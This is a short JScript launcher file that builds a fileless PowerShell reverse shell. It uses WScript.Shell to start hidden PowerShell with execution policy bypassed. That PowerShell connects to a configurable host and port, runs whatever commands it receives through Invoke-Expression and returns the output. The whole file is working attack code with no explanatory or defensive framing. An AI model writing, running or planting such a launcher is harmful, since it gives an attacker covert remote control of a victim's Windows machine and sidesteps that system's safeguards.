// rev_ps_fileless.jse - Fileless PowerShell reverse shell (JScript launcher)
(function () {
    var host = "127.0.0.1";
    var port = 8080;

    var psCode = "$client = New-Object System.Net.Sockets.TCPClient('" + host + "'," + port + ");" +
        "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};" +
        "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){" +
        "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" +
        "$sendback = (iex $data 2>&1 | Out-String );" +
        "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" +
        "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" +
        "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};" +
        "$client.Close()";

    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -Command \"" + psCode + "\"", 0, false);
})();
